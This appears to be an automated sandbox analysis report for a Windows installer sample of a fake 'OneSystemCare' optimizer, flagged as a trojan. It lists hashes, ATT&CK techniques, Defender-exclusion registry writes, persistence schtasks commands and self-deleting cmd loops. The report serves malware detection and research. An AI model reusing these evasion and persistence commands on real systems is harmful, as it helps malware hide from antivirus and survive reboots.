0b10445d96546c960980c58ed4a127789109c22e80cc55e1c6fc71c225fe52a0

Analysis

max time kernel
133s
max time network
116s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
02/06/2024, 03:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe
Size

5.8MB
MD5

8cbee6c1397062bb1628450c5ec910c0
SHA1

b947ab4cd31169102f9465eb0ae320c344d45d66
SHA256

0b10445d96546c960980c58ed4a127789109c22e80cc55e1c6fc71c225fe52a0
SHA512

b8fd5584fff70168a0f9c0e24f5d7bd6bb84cedb475d85d718427a8b8e107eeca6dcfa3268f7860bd11f69e745595c97944f3f77adacc0f37b00f35a8cd078d2
SSDEEP

98304:Ygex9b5hFymYiJ4VqAH2zUl6gibyi9E2MNHglavHo5ulExkg9saID:Y39b5KmYsewQotXS2M1caIFL9saID

Score

10^/10

discovery evasion trojan

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3712 created 116	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	101

Windows security bypass 2 TTPs 26 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OneSystemCare\setuphelper.dll = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\1717298857 = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C:\Users\Admin\AppData\Local\Temp\is-9IHPL.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\OneSystemCare.exe = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\is-F9E7J.tmp\jeuppxd.dll = "0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OneSystemCare\unins000.exe = "0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C:\Users\Admin\AppData\Local\Temp\is-PB8UD.tmp\jeuppxd.dll = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\is-GE4HP.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OneSystemCare\ = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\{C28A2216-5577-99F0-E8B8-143CDA8E55FF} = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\is-PB8UD.tmp\jeuppxd.dll = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C:\Users\Admin\AppData\Local\Temp\is-F9E7J.tmp\jeuppxd.dll = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OneSystemCare\unins000.exe = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\is-9IHPL.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C:\Users\Admin\AppData\Local\Temp\is-GE4HP.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\OneSystemCare.exe = "0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\1717298882 = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\{99C17827-B4F6-543D-5B11-99CBB0101848} = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OneSystemCare\ = "0"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OneSystemCare\setuphelper.dll = "0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe = "0"	regsvr32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp

Executes dropped EXE 5 IoCs

pid	Process
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
1688	unins000.exe
2464	_iu14D2N.tmp
4368	OneSystemCare.exe

Loads dropped DLL 7 IoCs

pid	Process
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4800	regsvr32.exe
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
880	regsvr32.exe
2464	_iu14D2N.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Maps connected drives based on registry 3 TTPs 8 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DISK\ENUM	OneSystemCare.exe
Key value enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	OneSystemCare.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DISK\ENUM	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Key value enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DISK\ENUM	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Key value enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DISK\ENUM	_iu14D2N.tmp
Key value enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	_iu14D2N.tmp

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\OneSystemCare\unins000.dat	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\OneSystemCare\jeuppxd.dll	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File created	C:\Program Files (x86)\OneSystemCare\unins000.dat	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File created	C:\Program Files (x86)\OneSystemCare\is-TVHCC.tmp	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File created	C:\Program Files (x86)\OneSystemCare\is-ND9TA.tmp	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File created	C:\Program Files (x86)\OneSystemCare\is-804O8.tmp	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File created	C:\Program Files (x86)\OneSystemCare\is-4INM1.tmp	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\OneSystemCare\unins000.dat	_iu14D2N.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4208	schtasks.exe
1644	schtasks.exe

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
932	timeout.exe
4500	timeout.exe
4892	timeout.exe
1900	timeout.exe
4412	timeout.exe
2108	timeout.exe
1388	timeout.exe
4340	timeout.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Token: SeDebugPrivilege	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Token: SeDebugPrivilege	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Token: SeDebugPrivilege	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Token: SeDebugPrivilege	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
Token: SeDebugPrivilege	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 4932	1088	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe	83
PID 1088 wrote to memory of 4932	1088	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe	83
PID 1088 wrote to memory of 4932	1088	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe	83
PID 4932 wrote to memory of 2304	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	99
PID 4932 wrote to memory of 2304	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	99
PID 4932 wrote to memory of 2304	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	99
PID 2304 wrote to memory of 3712	2304	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe	100
PID 2304 wrote to memory of 3712	2304	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe	100
PID 2304 wrote to memory of 3712	2304	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe	100
PID 3712 wrote to memory of 880	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	103
PID 3712 wrote to memory of 880	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	103
PID 3712 wrote to memory of 880	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	103
PID 640 wrote to memory of 3220	640	cmd.exe	109
PID 640 wrote to memory of 3220	640	cmd.exe	109
PID 3484 wrote to memory of 2744	3484	cmd.exe	111
PID 3484 wrote to memory of 2744	3484	cmd.exe	111
PID 3220 wrote to memory of 1304	3220	cmd.exe	112
PID 3220 wrote to memory of 1304	3220	cmd.exe	112
PID 3220 wrote to memory of 5056	3220	cmd.exe	114
PID 3220 wrote to memory of 5056	3220	cmd.exe	114
PID 2744 wrote to memory of 3176	2744	cmd.exe	115
PID 2744 wrote to memory of 3176	2744	cmd.exe	115
PID 3220 wrote to memory of 5024	3220	cmd.exe	116
PID 3220 wrote to memory of 5024	3220	cmd.exe	116
PID 2744 wrote to memory of 2728	2744	cmd.exe	117
PID 2744 wrote to memory of 2728	2744	cmd.exe	117
PID 3220 wrote to memory of 1972	3220	cmd.exe	118
PID 3220 wrote to memory of 1972	3220	cmd.exe	118
PID 2744 wrote to memory of 3728	2744	cmd.exe	119
PID 2744 wrote to memory of 3728	2744	cmd.exe	119
PID 2744 wrote to memory of 2148	2744	cmd.exe	120
PID 2744 wrote to memory of 2148	2744	cmd.exe	120
PID 3712 wrote to memory of 1688	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	123
PID 3712 wrote to memory of 1688	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	123
PID 3712 wrote to memory of 1688	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	123
PID 1688 wrote to memory of 2464	1688	unins000.exe	124
PID 1688 wrote to memory of 2464	1688	unins000.exe	124
PID 1688 wrote to memory of 2464	1688	unins000.exe	124
PID 3712 wrote to memory of 4368	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	127
PID 3712 wrote to memory of 4368	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	127
PID 3712 wrote to memory of 4368	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	127
PID 3712 wrote to memory of 4208	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	128
PID 3712 wrote to memory of 4208	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	128
PID 3712 wrote to memory of 4208	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	128
PID 3712 wrote to memory of 1644	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	130
PID 3712 wrote to memory of 1644	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	130
PID 3712 wrote to memory of 1644	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	130
PID 3712 wrote to memory of 4056	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	132
PID 3712 wrote to memory of 4056	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	132
PID 3712 wrote to memory of 4056	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	132
PID 3712 wrote to memory of 2636	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	133
PID 3712 wrote to memory of 2636	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	133
PID 3712 wrote to memory of 2636	3712	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	133
PID 4932 wrote to memory of 4248	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	136
PID 4932 wrote to memory of 4248	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	136
PID 4932 wrote to memory of 4248	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	136
PID 4932 wrote to memory of 3740	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	137
PID 4932 wrote to memory of 3740	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	137
PID 4932 wrote to memory of 3740	4932	8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp	137
PID 4056 wrote to memory of 2108	4056	cmd.exe	140
PID 4056 wrote to memory of 2108	4056	cmd.exe	140
PID 4056 wrote to memory of 2108	4056	cmd.exe	140
PID 2636 wrote to memory of 4892	2636	cmd.exe	141
PID 2636 wrote to memory of 4892	2636	cmd.exe	141

C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Users\Admin\AppData\Local\Temp\is-9IHPL.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-9IHPL.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp" /SL5="$501C4,5531366,151040,C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Maps connected drives based on registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\SysWOW64\regsvr32.exe" "C:\Users\Admin\AppData\Local\Temp\is-F9E7J.tmp\jeuppxd.dll" /i /n /s:"$$W1qCVMFBlmWvHzEpoppvGGwoeglUf7cH7BFngbsBnlM3PF6NommjgJIaZ3X-3nytg_SOMK-ewuX8bB3G_AqXOnxwdHNCkwgNV_39etGJ3lbbyIztb_TBiYGPBad7IE1Xs_7Ip51acNffqTN7B2GQmBroxL4260xVa5UzxPdUQwWIDJwEr3IQ5BOnanZMnbtrqpAeJB4Kok0eUnv033z0L9QMMmQezdJWlBlqAI5IweKnKVz08ccAr1GvG_weqOjvjzb8WsKLMuTntUS31bC8GkP-olZGvWipZd5_ttKcNdWWy303SnFffEXaiOJ8V7odV7o0MwWr4mslFAH2qrY_WD2O9Xaj8KG3EUviJta87HLIex1zn3D7h0iGtU3w_-IQuG5AFzaBe1e1AwDUyManhGMjoLRW5QleYwegcdgPZkW9l2KMmZCH58vWAaBbIwj55e9smPahgBB38iNNjQWyIpkq2PhcSCjhmOTGl0PPuR1Ll6kJHm9h6wWnYi-Vo6aj9T_fToc6QhvAa-6HeNQtBtyV0IR50mqDKvI7Un-4nIGCdk9aezYZ0NoBdC6esbiLSwyy8aq-L3ih2FRjUtppwJAInduKZ0U17cmP6IcuaSFFB3fwyPt-BcOoLSfkE37Cu-GGJeY_tThXGEdglw6yrTM1R_7FWujY_r4brm_YCUAbXRDmJfjxYmXrWhBdktM8upfnNpNF9TYjEpneUEEEgR70rj7jqoZ_tRtqlt8ThqMGmLzPVM9x8fp7f2gzvW0sMnzrm4uy-4HvwoY4$$"
    3⤵
    - Windows security bypass
    - Loads dropped DLL
    PID:4800
- - C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe
    C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe /VERYSILENT /SL5="$501C4,5531366,151040,C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2304
  - - C:\Users\Admin\AppData\Local\Temp\is-GE4HP.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-GE4HP.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp" /SL5="$401F2,5531366,151040,C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe" /VERYSILENT /SL5="$501C4,5531366,151040,C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Maps connected drives based on registry
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3712
    - - C:\Program Files (x86)\OneSystemCare\unins000.exe
        
        "C:\Program Files (x86)\OneSystemCare\unins000.exe" /sn=-B8eJ75j8pOdcBFQIhlx5s_pEUzrYHtTOBuWcwLLKIfyNtweNUs-il6_kFNdpHs2l8ds8WIQqL_2XTmZQVjRXbAI8Pw0-AYavptugYJTIRINRA5DmBvLqU2kX_8h65GlUj3HKgLVMcPGEEJQvyJUizQSFLOwbSJ18t5HQPJfAbbnLSqT2d1YsaCA4qjlNe5f9YVs-GT7zYdWBN4N_vK4pxnpNM7hVeMtAN7z6EXBSMXXbAQRR5UCmPWhL8ZfKOeN3ZW-g7L0gALnxEZ_9cE-vwJxH8vqoK6O3iptRl5nJD9l7hQ0oby_QLFAxcgi9c6RKnEYzkHza81qdPrTNHi8UBaqyCDY43VNX4qkwpqQjvTrgz-slaBjjcoz2m7T4H5m6kHY1UOMOKeq3c6KLhmidK6w4TFtI3gIKcj_1ESksUdfe2NM5fDjjVnGVF7Q_pfa6642Oaigl36pltXuzDQVfhft5HztKc8vxDylTqTmdfUYNutLkMZRdVASXvRNE5gPcS7MX-KVyqpXA8zB8yg3ZTRzid0ky9w-iJtuiMCIUVQfTn06R0nYRQv2ncB0b5K_013CoZw1gZCujC0mzGhxG9fScsI0ekFY0cqHbxLm0gwpQx9fQxw4ZiaqQcU48wkPeKc6ZwjcLETtxpwDVWD8kY2tlXLl5ODnTeyZy-R9wD3IuCcFo2CLhm9SSc60djUplzcuLjjvlmOfeDpVkc59jsBJby9ZTt8UL_ep3PObirO7t5SGbZNa77Qqpk_Z0HL4Qh2fVEfJc3fA2MUSdd_4TNcDjG2_CliH1e14gq9gObtNaHhV
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1688
      - C:\Users\Admin\AppData\Local\Temp\_iu14D2N.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\_iu14D2N.tmp" /SECONDPHASE="C:\Program Files (x86)\OneSystemCare\unins000.exe" /FIRSTPHASEWND=$501EE /sn=-B8eJ75j8pOdcBFQIhlx5s_pEUzrYHtTOBuWcwLLKIfyNtweNUs-il6_kFNdpHs2l8ds8WIQqL_2XTmZQVjRXbAI8Pw0-AYavptugYJTIRINRA5DmBvLqU2kX_8h65GlUj3HKgLVMcPGEEJQvyJUizQSFLOwbSJ18t5HQPJfAbbnLSqT2d1YsaCA4qjlNe5f9YVs-GT7zYdWBN4N_vK4pxnpNM7hVeMtAN7z6EXBSMXXbAQRR5UCmPWhL8ZfKOeN3ZW-g7L0gALnxEZ_9cE-vwJxH8vqoK6O3iptRl5nJD9l7hQ0oby_QLFAxcgi9c6RKnEYzkHza81qdPrTNHi8UBaqyCDY43VNX4qkwpqQjvTrgz-slaBjjcoz2m7T4H5m6kHY1UOMOKeq3c6KLhmidK6w4TFtI3gIKcj_1ESksUdfe2NM5fDjjVnGVF7Q_pfa6642Oaigl36pltXuzDQVfhft5HztKc8vxDylTqTmdfUYNutLkMZRdVASXvRNE5gPcS7MX-KVyqpXA8zB8yg3ZTRzid0ky9w-iJtuiMCIUVQfTn06R0nYRQv2ncB0b5K_013CoZw1gZCujC0mzGhxG9fScsI0ekFY0cqHbxLm0gwpQx9fQxw4ZiaqQcU48wkPeKc6ZwjcLETtxpwDVWD8kY2tlXLl5ODnTeyZy-R9wD3IuCcFo2CLhm9SSc60djUplzcuLjjvlmOfeDpVkc59jsBJby9ZTt8UL_ep3PObirO7t5SGbZNa77Qqpk_Z0HL4Qh2fVEfJc3fA2MUSdd_4TNcDjG2_CliH1e14gq9gObtNaHhV
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Maps connected drives based on registry
        Drops file in Program Files directory
        
        PID:2464
    - - C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe
        
        "C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe" /sn=WoqzLzrUdyCDFsiWhl1dJi2-RqcPt-asi4bUr5uJ00slF3FB76_vXDZ8YxiCUK3ZCWbdxLTNiloIWefG4NLXLP1lzUPDTfRrVa8FKVpr2CQFMAb0PtmxR1TqGDg5O34Xcgrjkw5cpL_U71ctCdm5xSHpFmeIDbsZSU76nCi_LkuFB7kR6ADW_XhMVbMW1dmqm4iQ_5r3kF_Kq1jCXvyaapMfhZxUJkPYdwr8XngznSKEQcuC0fxZeow_c-Wbw60WZ-9MFvA2P522HC9b5sVdShKMhgN9Mhp7N0J-g61JvNPbai7QP_2I3XdxbvZV9Rgc0iDsXUj7hnJoF2GTvnluNqncF5anuO5xw9EBkelioeuFxeDWOt92DsDd5lujbQyKfqG4AtRhnT9IEW8yo4oegf5g5areLeaLMqpTyxLRBN1xE4O99vTC1WLSFd2xgoZSLxVat4L6zl2ZObqGGYmaFv1aNySBpqiVEf_J9bMJyTUUbetIUdfPO4MhFy2dcGTFPBp_hz_bYTFGq6ZbkqaBxiKdUXA0VC7CHA-bh9VDmQISVNnzxe71DSmkFU351-m5WRh7uKWcaoJEk2fE43jmuxJZanT2FVDvKuSiHc9A-gNwXEwOF1ubE1MIedHt3QmDcw7n0Ml05TDauTF-4OIC_jrXErLpDzzPx_a_ny7HWyQ79nb1DdsxALHzfOZhR9Nl_wHAPGOlfnCA3C246frCYIzDetHaMgkKZKdvz8bkkMxWF_F9gEmIxE8Jr0hQQ86w_FiWQJLoE3beB4jIdj4HGXuqvqg5ENXOn5ruuPt6jKjnegyvdfxCj9ulb3buBt4tuFzP
        5⤵
        Executes dropped EXE
        Maps connected drives based on registry
        
        PID:4368
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TR "'C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe' --scan" /sc ONCE /st 03:34 /sd 06/02/2024 /TN "One System Care Delayed" /F /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:4208
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TR "'C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe' -Notify" /sc onlogon /TN "One System Care Monitor" /F /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:1644
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c for /l %x in (1, 1, 2) do del /Q "C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe" & timeout /t 5
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:2108
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:4500
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c for /l %x in (1, 1, 2) do rmdir /S /Q "C:\Users\Admin\AppData\Local\Temp\is-PB8UD.tmp" & timeout /t 5
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2636
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:4892
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:1388
- - C:\Windows\SysWOW64\cmd.exe
